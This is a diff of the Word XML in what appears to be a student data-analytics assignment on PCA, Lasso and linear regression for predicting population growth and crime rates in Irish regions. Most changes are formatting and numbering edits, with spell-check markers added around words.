+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Figure 12 – Lasso Regression Residual Plot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After Understanding PCA e Linear Regression, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> we will now use only the principal features of our datasets to predict population growth and crime rates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">First, we will 2023 to predict population growth for the next </w:t>
+      </w:r>
+      <w:r>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> years. Then, we will use this result as an input to a linear regression model to predict crime rates for the next </w:t>
+      </w:r>
+      <w:r>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> years.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Predicting Population growth:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -13407,29 +13741,7 @@
           <w:lang w:val="fr-FR"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3.1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
+        <w:t xml:space="preserve">3.1 Sample Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13590,31 +13902,7 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.5 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
+        <w:t xml:space="preserve">3.5 Sample Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13718,7 +14006,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="401AA8CD">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="26F5F61D">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -13741,7 +14029,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37" cstate="print">
+                    <a:blip r:embed="rId42" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -13772,7 +14060,7 @@
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId38"/>
+      <w:footerReference w:type="default" r:id="rId43"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">
@@ -14711,9 +14999,9 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="2ED015B1"/>
+    <w:nsid w:val="21AE570E"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="D18CA3C4"/>
+    <w:tmpl w:val="D68C38DE"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -14860,9 +15148,9 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="36714E74"/>
+    <w:nsid w:val="2ED015B1"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="187EFDD0"/>
+    <w:tmpl w:val="D18CA3C4"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -15009,6 +15297,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="36714E74"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="187EFDD0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3CC628F4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CDCED664"/>
@@ -15129,7 +15566,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42D222BE"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="2796FD26"/>
@@ -15278,7 +15715,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="476E1581"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="76C603AC"/>
@@ -15400,7 +15837,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFE6204"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="08A06254"/>
@@ -15549,7 +15986,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="517C4A0B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9B22E250"/>
@@ -15698,7 +16135,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5344241A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
@@ -16019,7 +16456,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="536E5AC0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="8CDAEE96"/>
@@ -16168,7 +16605,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="59E86317"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="468E0D0E"/>
@@ -16281,7 +16718,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5B273C87"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2AA8E13E"/>
@@ -16394,7 +16831,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="606707C5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9E56C806"/>
@@ -16543,13 +16980,13 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="648F1753"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
     <w:numStyleLink w:val="ImportedStyle1"/>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="65716509"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AE00DACA"/>
@@ -16698,7 +17135,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="674C097A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9F9468A6"/>
@@ -16847,7 +17284,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="725D2623"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="87A8D2E8"/>
@@ -16996,7 +17433,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A83416C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0AAA7DC0"/>
@@ -17146,34 +17583,34 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1760440869">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="305356629">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1166743486">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1173181685">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1246454614">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1393307185">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1530295400">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="2134978705">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1819345686">
     <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="8" w16cid:durableId="2134978705">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="1819345686">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
   <w:num w:numId="10" w16cid:durableId="1624070426">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="881406841">
     <w:abstractNumId w:val="1"/>
@@ -17182,34 +17619,37 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="13" w16cid:durableId="266432641">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="1958953252">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="1294672183">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="354817324">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="584535353">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="18" w16cid:durableId="378936254">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="1385257368">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1897400402">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="1502046198">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="22" w16cid:durableId="428621930">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="251742147">
+    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>

--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -307,12 +307,37 @@
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Bharathi Chakravarthi/</w:t>
+              <w:t>Bharathi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t>Chakravarthi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t>/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -325,8 +350,17 @@
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Marina Iantorno</w:t>
+              <w:t xml:space="preserve">Marina </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t>Iantorno</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3235,6 +3269,7 @@
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3243,8 +3278,31 @@
                 <w:szCs w:val="16"/>
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
-              <w:t>Dún Laoghaire-Rathdown</w:t>
+              <w:t>Dún</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+                <w:lang w:eastAsia="en-IE"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Laoghaire-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+                <w:lang w:eastAsia="en-IE"/>
+              </w:rPr>
+              <w:t>Rathdown</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5169,7 +5227,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a Jupyter Notebook:</w:t>
+        <w:t xml:space="preserve">Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Notebook:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5377,6 +5453,7 @@
         </w:rPr>
         <w:t>“</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5385,6 +5462,7 @@
         </w:rPr>
         <w:t>crime_df</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5401,6 +5479,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5431,7 +5510,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>rame, one</w:t>
+        <w:t>rame</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, one</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5441,6 +5529,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> ‘</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5449,6 +5538,7 @@
         </w:rPr>
         <w:t>NaN</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5498,7 +5588,53 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The method .dropna() has been used in this dataframe.</w:t>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>method .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dropna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">() has been used in this </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dataframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5604,6 +5740,7 @@
         </w:rPr>
         <w:t xml:space="preserve">EDA allows us to gain an overall understanding of the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -5626,7 +5763,14 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>rames, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
